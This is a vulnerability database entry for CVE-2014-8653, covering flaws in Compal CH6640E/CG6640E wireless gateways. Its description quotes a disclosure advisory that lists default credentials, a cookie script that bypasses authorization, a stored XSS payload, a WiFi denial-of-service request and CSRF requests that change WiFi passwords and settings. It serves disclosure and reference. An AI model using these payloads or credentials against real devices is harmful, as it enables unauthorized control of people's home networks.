Details of VAR-201411-0176

ID

VAR-201411-0176

CVE

CVE-2014-8653

TITLE

Compal Broadband Networks of CH6640E and CG6640E Wireless Gateway Firmware cross-site scripting vulnerability

Trust: 0.8

sources: JVNDB: JVNDB-2014-005240

DESCRIPTION

Cross-site scripting (XSS) vulnerability in Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway 1.0 with firmware CH6640-3.5.11.7-NOSH allows remote attackers to inject arbitrary web script or HTML via the userData cookie. The CBN CH6640E and CG6640E are wireless gateway devices. CBN CH6640E and CG6640E have multiple security vulnerabilities that allow an attacker to exploit vulnerabilities to bypass authorized access to sensitive information, perform cross-site scripting, cross-site request forgery, and denial of service attacks. Firmware is prone to a cross-site scripting vulnerability. Product web page: http://www.icbn.com.tw Affected version: Model: CH6640 and CH6640E Hardware version: 1.0 Firmware version: CH6640-3.5.11.7-NOSH Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01 DOCSIS mode: DOCSIS 3.0 Summary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home, home office, or small business/enterprise. It can be used in households with one or more computers capable of wireless connectivity for remote access to the wireless gateway. Default credentials: admin/admin - Allow access gateway pages root/compalbn - Allow access gateway, provisioning pages and provide more configuration information. Tested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7 Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2014-5203 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php 04.10.2014 --- Authorization Bypass Information Disclosure Vulnerability ######################################################### http://192.168.0.1/xml/CmgwWirelessSecurity.xml http://192.168.0.1/xml/DocsisConfigFile.xml http://192.168.0.1/xml/CmgwBasicSetup.xml http://192.168.0.1/basicDDNS.html http://192.168.0.1/basicLanUsers.html http://192.168.0.1:5000/rootDesc.xml Set cookie: userData to root or admin, reveals additional pages/info. -- <html> <body> <script> document.cookie="userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/"; </script> </body> </html> -- Denial of Service (DoS) for all WiFi connected clients (disconnect) ################################################################### GET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1 Stored Cross-Site Scripting (XSS) Vulnerability ############################################### Cookie: userData Value: hax0r"><script>alert(document.cookie);</script> -- <html> <body> <script> document.cookie="hax0r"><script>alert(document.cookie);</script>; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/"; </script> </body> </html> -- Cross-Site Request Forgery (CSRF) Vulnerability ############################################### DDNS config: ------------ GET http://192.168.0.1/basicDDNS.html?DdnsService=1&DdnsUserName=a&DdnsPassword=b&DdnsHostName=c# HTTP/1.1 Change wifi pass: ----------------- GET http://192.168.0.1/setWirelessSecurity.html?Ssid=0&sMode=7&sbMode=1&encAlgm=3&psKey=NEW_PASSWORD&rekeyInt=0 HTTP/1.1 Add static mac address (static assigned dhcp client): ----------------------------------------------------- GET http://192.168.0.1/setBasicDHCP1.html?action=add_static&MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF&LeasedIP=8 HTTP/1.1 Enable/Disable UPnP: -------------------- GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=1 HTTP/1.1 (enable) GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=2 HTTP/1.1 (disable)

Trust: 2.79

sources: NVD: CVE-2014-8653 // JVNDB: JVNDB-2014-005240 // CNVD: CNVD-2014-07893 // BID: 80057 // ZSL: ZSL-2014-5203 // VULHUB: VHN-76598 // VULMON: CVE-2014-8653 // PACKETSTORM: 128860

IOT TAXONOMY

category:

['Network device']

sub_category:

Trust: 0.6

sources: CNVD: CNVD-2014-07893

AFFECTED PRODUCTS

vendor:	compal broadband	model:	cg6640e wireless gateway	scope:	eq	version:	1.0	Trust: 1.8
vendor:	compal broadband	model:	-	scope:	eq	version:	ch6640-3.5.11.7-nosh	Trust: 1.6
vendor:	compal broadband	model:	ch664oe wireless gateway	scope:	eq	version:	1.0	Trust: 1.0
vendor:	compal broadband	model:	ch6640e wireless gateway	scope:	eq	version:	1.0	Trust: 0.8
vendor:	compal broadband	model:	networks	scope:	eq	version:	ch6640-3.5.11.7-nosh	Trust: 0.8
vendor:	compal	model:	broadband networks inc cg6640e wireless gateway	scope:	eq	version:	1.0	Trust: 0.6
vendor:	compal	model:	broadband networks inc ch6640e wireless gateway	scope:	eq	version:	1.0	Trust: 0.6
vendor:	compal	model:	broadband networks ch6640-3.5.11.7-nosh	scope:	-	version:	-	Trust: 0.3
vendor:	compal	model:	broadband networks ch664oe wireless gateway	scope:	eq	version:	1.0	Trust: 0.3
vendor:	compal	model:	broadband networks cg6640e wireless gateway	scope:	eq	version:	1.0	Trust: 0.3
vendor:	compal broadband cbn	model:	ch	scope:	eq	version:	model: ch6640 and ch6640e	Trust: 0.1
vendor:	compal broadband cbn	model:	ch	scope:	eq	version:	hardware version: 1.0	Trust: 0.1
vendor:	compal broadband cbn	model:	ch	scope:	eq	version:	firmware version: ch6640-3.5.11.7-nosh	Trust: 0.1
vendor:	compal broadband cbn	model:	ch	scope:	eq	version:	boot version: pspu-boot(bbu) 1.0.19.25m1-cbn01	Trust: 0.1
vendor:	compal broadband cbn	model:	ch	scope:	eq	version:	docsis mode: docsis 3.0	Trust: 0.1

sources: ZSL: ZSL-2014-5203 // CNVD: CNVD-2014-07893 // BID: 80057 // JVNDB: JVNDB-2014-005240 // CNNVD: CNNVD-201410-1374 // NVD: CVE-2014-8653

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov:	CVE-2014-8653
value:	MEDIUM
Trust: 1.0
NVD:	CVE-2014-8653
value:	MEDIUM
Trust: 0.8
CNVD:	CNVD-2014-07893
value:	HIGH
Trust: 0.6
CNNVD:	CNNVD-201410-1374
value:	MEDIUM
Trust: 0.6
ZSL:	ZSL-2014-5203
value:	(3/5)
Trust: 0.1
VULHUB:	VHN-76598
value:	MEDIUM
Trust: 0.1
VULMON:	CVE-2014-8653
value:	MEDIUM
Trust: 0.1

nvd@nist.gov:	CVE-2014-8653
severity:	MEDIUM
baseScore:	4.3
vectorString:	AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector:	NETWORK
accessComplexity:	MEDIUM
authentication:	NONE
confidentialityImpact:	NONE
integrityImpact:	PARTIAL
availabilityImpact:	NONE
exploitabilityScore:	8.6
impactScore:	2.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 1.9
CNVD:	CNVD-2014-07893
severity:	HIGH
baseScore:	7.5
vectorString:	AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	PARTIAL
availabilityImpact:	PARTIAL
exploitabilityScore:	10.0
impactScore:	6.4
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.6
VULHUB:	VHN-76598
severity:	MEDIUM
baseScore:	4.3
vectorString:	AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector:	NETWORK
accessComplexity:	MEDIUM
authentication:	NONE
confidentialityImpact:	NONE
integrityImpact:	PARTIAL
availabilityImpact:	NONE
exploitabilityScore:	8.6
impactScore:	2.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.1

sources: ZSL: ZSL-2014-5203 // CNVD: CNVD-2014-07893 // VULHUB: VHN-76598 // VULMON: CVE-2014-8653 // JVNDB: JVNDB-2014-005240 // CNNVD: CNNVD-201410-1374 // NVD: CVE-2014-8653

PROBLEMTYPE DATA

problemtype:

CWE-79

Trust: 1.9

sources: VULHUB: VHN-76598 // JVNDB: JVNDB-2014-005240 // NVD: CVE-2014-8653

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201410-1374

TYPE

XSS

Trust: 0.6

sources: CNNVD: CNNVD-201410-1374

CONFIGURATIONS

sources: JVNDB: JVNDB-2014-005240

EXPLOIT AVAILABILITY

sources: ZSL: ZSL-2014-5203 // VULHUB: VHN-76598 // VULMON: CVE-2014-8653

PATCH

title:

Top Page

url:

http://www.icbn.com.tw/

Trust: 0.8

sources: JVNDB: JVNDB-2014-005240

EXTERNAL IDS

db:	NVD	id:	CVE-2014-8653	Trust: 3.6
db:	EXPLOIT-DB	id:	35075	Trust: 3.0
db:	BID	id:	70762	Trust: 2.8
db:	ZSL	id:	ZSL-2014-5203	Trust: 2.6
db:	PACKETSTORM	id:	128860	Trust: 2.0
db:	OSVDB	id:	113839	Trust: 1.9
db:	XF	id:	98328	Trust: 1.0
db:	JVNDB	id:	JVNDB-2014-005240	Trust: 0.8
db:	CNNVD	id:	CNNVD-201410-1374	Trust: 0.7
db:	CNVD	id:	CNVD-2014-07893	Trust: 0.6
db:	BID	id:	80057	Trust: 0.5
db:	XF	id:	98329	Trust: 0.1
db:	OSVDB	id:	113843	Trust: 0.1
db:	OSVDB	id:	113838	Trust: 0.1
db:	OSVDB	id:	113836	Trust: 0.1
db:	OSVDB	id:	113842	Trust: 0.1
db:	OSVDB	id:	113841	Trust: 0.1
db:	OSVDB	id:	113840	Trust: 0.1
db:	OSVDB	id:	113837	Trust: 0.1
db:	CXSECURITY	id:	WLB-2014100162	Trust: 0.1
db:	VULHUB	id:	VHN-76598	Trust: 0.1
db:	VULMON	id:	CVE-2014-8653	Trust: 0.1

sources: ZSL: ZSL-2014-5203 // CNVD: CNVD-2014-07893 // VULHUB: VHN-76598 // VULMON: CVE-2014-8653 // BID: 80057 // JVNDB: JVNDB-2014-005240 // PACKETSTORM: 128860 // CNNVD: CNNVD-201410-1374 // NVD: CVE-2014-8653

REFERENCES

url:	http://www.zeroscience.mk/en/vulnerabilities/zsl-2014-5203.php	Trust: 2.5
url:	http://www.securityfocus.com/bid/70762	Trust: 2.2
url:	http://www.exploit-db.com/exploits/35075	Trust: 2.1
url:	http://osvdb.org/show/osvdb/113839	Trust: 1.9
url:	http://packetstormsecurity.com/files/128860/cbn-ch6640e-cg6640e-wireless-gateway-xss-csrf-dos-disclosure.html	Trust: 1.8
url:	https://exchange.xforce.ibmcloud.com/vulnerabilities/98328	Trust: 1.2
url:	http://www.exploit-db.com/exploits/35075/	Trust: 1.0
url:	http://xforce.iss.net/xforce/xfdb/98328	Trust: 1.0
url:	http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8653	Trust: 0.9
url:	http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-8653	Trust: 0.8
url:	http://cxsecurity.com/issue/wlb-2014100162	Trust: 0.1
url:	http://osvdb.org/show/osvdb/113836	Trust: 0.1
url:	http://osvdb.org/show/osvdb/113837	Trust: 0.1
url:	http://osvdb.org/show/osvdb/113838	Trust: 0.1
url:	http://osvdb.org/show/osvdb/113840	Trust: 0.1
url:	http://osvdb.org/show/osvdb/113841	Trust: 0.1
url:	http://osvdb.org/show/osvdb/113842	Trust: 0.1
url:	http://osvdb.org/show/osvdb/113843	Trust: 0.1
url:	http://packetstormsecurity.com/files/128860	Trust: 0.1
url:	http://xforce.iss.net/xforce/xfdb/98329	Trust: 0.1
url:	http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8653	Trust: 0.1
url:	http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8654	Trust: 0.1
url:	http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8655	Trust: 0.1
url:	http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8656	Trust: 0.1
url:	http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8657	Trust: 0.1
url:	http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8654	Trust: 0.1
url:	http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8655	Trust: 0.1
url:	http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8656	Trust: 0.1
url:	http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8657	Trust: 0.1
url:	https://cwe.mitre.org/data/definitions/79.html	Trust: 0.1
url:	https://nvd.nist.gov	Trust: 0.1
url:	https://www.securityfocus.com/bid/80057	Trust: 0.1
url:	http://192.168.0.1/basiclanusers.html	Trust: 0.1
url:	http://192.168.0.1/xml/docsisconfigfile.xml	Trust: 0.1
url:	http://192.168.0.1/xml/cmgwbasicsetup.xml	Trust: 0.1
url:	http://192.168.0.1/setwirelesssecurity.html?ssid=0&smode=7&sbmode=1&encalgm=3&pskey=new_password&rekeyint=0	Trust: 0.1
url:	http://192.168.0.1:5000/rootdesc.xml	Trust: 0.1
url:	http://192.168.0.1/basicddns.html	Trust: 0.1
url:	http://192.168.0.1/setadvancedoptions.html?action=apply&instance=undefined&upnp=1	Trust: 0.1
url:	http://192.168.0.1/xml/cmgwwirelesssecurity.xml	Trust: 0.1
url:	http://192.168.0.1/wirelesschannelstatus.html	Trust: 0.1
url:	http://192.168.0.1/setbasicdhcp1.html?action=add_static&macaddress=38%3a59%3af9%3ac3%3ae3%3aef&leasedip=8	Trust: 0.1
url:	http://www.icbn.com.tw	Trust: 0.1
url:	http://192.168.0.1/basicddns.html?ddnsservice=1&ddnsusername=a&ddnspassword=b&ddnshostname=c#	Trust: 0.1
url:	http://192.168.0.1/setadvancedoptions.html?action=apply&instance=undefined&upnp=2	Trust: 0.1

CREDITS

LiquidWorm

Trust: 0.7

sources: PACKETSTORM: 128860 // CNNVD: CNNVD-201410-1374

SOURCES

db:	ZSL	id:	ZSL-2014-5203
db:	CNVD	id:	CNVD-2014-07893
db:	VULHUB	id:	VHN-76598
db:	VULMON	id:	CVE-2014-8653
db:	BID	id:	80057
db:	JVNDB	id:	JVNDB-2014-005240
db:	PACKETSTORM	id:	128860
db:	CNNVD	id:	CNNVD-201410-1374
db:	NVD	id:	CVE-2014-8653

LAST UPDATE DATE

2025-04-13T23:14:41.475000+00:00

SOURCES UPDATE DATE

db:	ZSL	id:	ZSL-2014-5203	date:	2014-11-07T00:00:00
db:	CNVD	id:	CNVD-2014-07893	date:	2014-11-10T00:00:00
db:	VULHUB	id:	VHN-76598	date:	2017-09-08T00:00:00
db:	VULMON	id:	CVE-2014-8653	date:	2017-09-08T00:00:00
db:	BID	id:	80057	date:	2014-11-06T00:00:00
db:	JVNDB	id:	JVNDB-2014-005240	date:	2014-11-07T00:00:00
db:	CNNVD	id:	CNNVD-201410-1374	date:	2014-11-13T00:00:00
db:	NVD	id:	CVE-2014-8653	date:	2025-04-12T10:46:40.837

SOURCES RELEASE DATE

db:	ZSL	id:	ZSL-2014-5203	date:	2014-10-25T00:00:00
db:	CNVD	id:	CNVD-2014-07893	date:	2014-11-04T00:00:00
db:	VULHUB	id:	VHN-76598	date:	2014-11-06T00:00:00
db:	VULMON	id:	CVE-2014-8653	date:	2014-11-06T00:00:00
db:	BID	id:	80057	date:	2014-11-06T00:00:00
db:	JVNDB	id:	JVNDB-2014-005240	date:	2014-11-07T00:00:00
db:	PACKETSTORM	id:	128860	date:	2014-10-28T00:59:24
db:	CNNVD	id:	CNNVD-201410-1374	date:	2014-10-29T00:00:00
db:	NVD	id:	CVE-2014-8653	date:	2014-11-06T15:55:10.757